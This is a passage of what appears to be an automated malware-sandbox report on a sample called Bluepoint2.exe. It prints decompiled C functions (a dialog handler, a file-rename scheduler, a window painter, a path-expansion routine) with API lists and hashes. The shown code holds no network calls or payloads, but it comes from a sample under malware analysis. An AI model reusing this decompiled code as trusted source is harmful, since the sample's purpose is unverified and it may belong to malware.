                                                                                                                                    • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                                                                                                    • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                                                                                                                                    0x00404795
                                                                                                                                    0x004048c2
                                                                                                                                    0x0040491f
                                                                                                                                    0x00404923
                                                                                                                                    0x004049f0
                                                                                                                                    0x004049f2
                                                                                                                                    0x004049f2
                                                                                                                                    0x004049f8
                                                                                                                                    0x004049f8
                                                                                                                                    0x004049fb
                                                                                                                                    0x00000000
                                                                                                                                    0x00404a02
                                                                                                                                    0x00404931
                                                                                                                                    0x00404937
                                                                                                                                    0x00404941
                                                                                                                                    0x0040494c
                                                                                                                                    0x0040494f
                                                                                                                                    0x00404952
                                                                                                                                    0x0040495d
                                                                                                                                    0x00404960
                                                                                                                                    0x00404967
                                                                                                                                    0x00404974
                                                                                                                                    0x00404985
                                                                                                                                    0x0040498b
                                                                                                                                    0x00404993
                                                                                                                                    0x004049a1
                                                                                                                                    0x004049a7
                                                                                                                                    0x004049a7
                                                                                                                                    0x00404967
                                                                                                                                    0x004049b1
                                                                                                                                    0x00000000
                                                                                                                                    0x004049bc
                                                                                                                                    0x004049c0
                                                                                                                                    0x004049d0
                                                                                                                                    0x004049d0
                                                                                                                                    0x004049d6
                                                                                                                                    0x004049e2
                                                                                                                                    0x004049e2
                                                                                                                                    0x00000000
                                                                                                                                    0x004049e6
                                                                                                                                    0x004049b1
                                                                                                                                    0x004048cd
                                                                                                                                    0x00000000
                                                                                                                                    0x004048df
                                                                                                                                    0x004048e4
                                                                                                                                    0x004048ea
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404913
                                                                                                                                    0x00404915
                                                                                                                                    0x0040491a
                                                                                                                                    0x00000000
                                                                                                                                    0x0040491a
                                                                                                                                    0x004048cd
                                                                                                                                    0x0040479b
                                                                                                                                    0x0040479e
                                                                                                                                    0x004047a3
                                                                                                                                    0x004047b4
                                                                                                                                    0x004047b4
                                                                                                                                    0x004047bc
                                                                                                                                    0x004047bf
                                                                                                                                    0x004047c3
                                                                                                                                    0x004047c6
                                                                                                                                    0x004047ca
                                                                                                                                    0x004047cd
                                                                                                                                    0x004047d0
                                                                                                                                    0x004047d3
                                                                                                                                    0x004047da
                                                                                                                                    0x004047dc
                                                                                                                                    0x004047dc
                                                                                                                                    0x004047e6
                                                                                                                                    0x004047f3
                                                                                                                                    0x004047fd
                                                                                                                                    0x00404802
                                                                                                                                    0x00404805
                                                                                                                                    0x0040480a
                                                                                                                                    0x00404821
                                                                                                                                    0x00404828
                                                                                                                                    0x0040483b
                                                                                                                                    0x0040483e
                                                                                                                                    0x00404852
                                                                                                                                    0x00404859
                                                                                                                                    0x0040485e
                                                                                                                                    0x00404863
                                                                                                                                    0x00404863
                                                                                                                                    0x00404871
                                                                                                                                    0x0040487f
                                                                                                                                    0x00404891
                                                                                                                                    0x00404896
                                                                                                                                    0x004048a6
                                                                                                                                    0x004048a8
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                                                                                    • GetSysColor.USER32(?), ref: 00404863
                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404906
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404985
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004049A1
                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                    • String ID: Call$N
                                                                                                                                    • API String ID: 3103080414-3438112850
                                                                                                                                    • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                                                                    • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                                                                                    • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                                                                    • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                                                                    0x004062ae
                                                                                                                                    0x004062b7
                                                                                                                                    0x004062be
                                                                                                                                    0x004062c8
                                                                                                                                    0x004062dc
                                                                                                                                    0x00406304
                                                                                                                                    0x0040630b
                                                                                                                                    0x0040630f
                                                                                                                                    0x00406313
                                                                                                                                    0x00406333
                                                                                                                                    0x0040633a
                                                                                                                                    0x00406344
                                                                                                                                    0x00406351
                                                                                                                                    0x00406356
                                                                                                                                    0x0040635b
                                                                                                                                    0x0040635f
                                                                                                                                    0x0040636e
                                                                                                                                    0x00406370
                                                                                                                                    0x0040637d
                                                                                                                                    0x00406381
                                                                                                                                    0x0040641c
                                                                                                                                    0x00000000
                                                                                                                                    0x00406397
                                                                                                                                    0x004063a4
                                                                                                                                    0x004063c8
                                                                                                                                    0x004063cc
                                                                                                                                    0x004063eb
                                                                                                                                    0x004063ef
                                                                                                                                    0x004063ef
                                                                                                                                    0x004063f1
                                                                                                                                    0x004063fa
                                                                                                                                    0x00406405
                                                                                                                                    0x00406410
                                                                                                                                    0x00406416
                                                                                                                                    0x00000000
                                                                                                                                    0x00406416
                                                                                                                                    0x004063ce
                                                                                                                                    0x004063d1
                                                                                                                                    0x004063dc
                                                                                                                                    0x004063d8
                                                                                                                                    0x004063da
                                                                                                                                    0x004063db
                                                                                                                                    0x004063db
                                                                                                                                    0x004063e3
                                                                                                                                    0x004063e5
                                                                                                                                    0x00000000
                                                                                                                                    0x004063e5
                                                                                                                                    0x004063af
                                                                                                                                    0x004063b5
                                                                                                                                    0x00000000
                                                                                                                                    0x004063b5
                                                                                                                                    0x00406381
                                                                                                                                    0x0040635f
                                                                                                                                    0x004062de
                                                                                                                                    0x004062e9
                                                                                                                                    0x004062f2
                                                                                                                                    0x004062f6
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004062f6
                                                                                                                                    0x00406427

                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2
                                                                                                                                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                                                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                                                                    • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
                                                                                                                                    • wsprintfA.USER32 ref: 0040632D
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                                                                    • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406416
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                                                                                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Bluepoint2.exe,80000000,00000003), ref: 0040615C
                                                                                                                                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                    • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                                                                    • API String ID: 2171350718-2295842750
                                                                                                                                    • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                                                                    • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                                                                                    • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                                                                    • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                                                                                    0x0040100a
                                                                                                                                    0x00401039
                                                                                                                                    0x00401047
                                                                                                                                    0x0040104d
                                                                                                                                    0x00401051
                                                                                                                                    0x0040105b
                                                                                                                                    0x00401061
                                                                                                                                    0x00401064
                                                                                                                                    0x004010f3
                                                                                                                                    0x00401089
                                                                                                                                    0x0040108c
                                                                                                                                    0x004010a6
                                                                                                                                    0x004010bd
                                                                                                                                    0x004010cc
                                                                                                                                    0x004010cf
                                                                                                                                    0x004010d5
                                                                                                                                    0x004010d9
                                                                                                                                    0x004010e4
                                                                                                                                    0x004010ed
                                                                                                                                    0x004010ef
                                                                                                                                    0x004010ef
                                                                                                                                    0x00401100
                                                                                                                                    0x00401105
                                                                                                                                    0x0040110d
                                                                                                                                    0x00401110
                                                                                                                                    0x00401112
                                                                                                                                    0x00401118
                                                                                                                                    0x0040111f
                                                                                                                                    0x00401126
                                                                                                                                    0x00401130
                                                                                                                                    0x00401142
                                                                                                                                    0x00401156
                                                                                                                                    0x00401160
                                                                                                                                    0x00401165
                                                                                                                                    0x00401165
                                                                                                                                    0x00401110
                                                                                                                                    0x0040116e
                                                                                                                                    0x00000000
                                                                                                                                    0x00401178
                                                                                                                                    0x00401010
                                                                                                                                    0x00401013
                                                                                                                                    0x00401015
                                                                                                                                    0x0040101f
                                                                                                                                    0x0040101f
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                    • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                    • String ID: F
                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                    • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                                                                    • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                                                                                    • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                                                                    • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                    			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
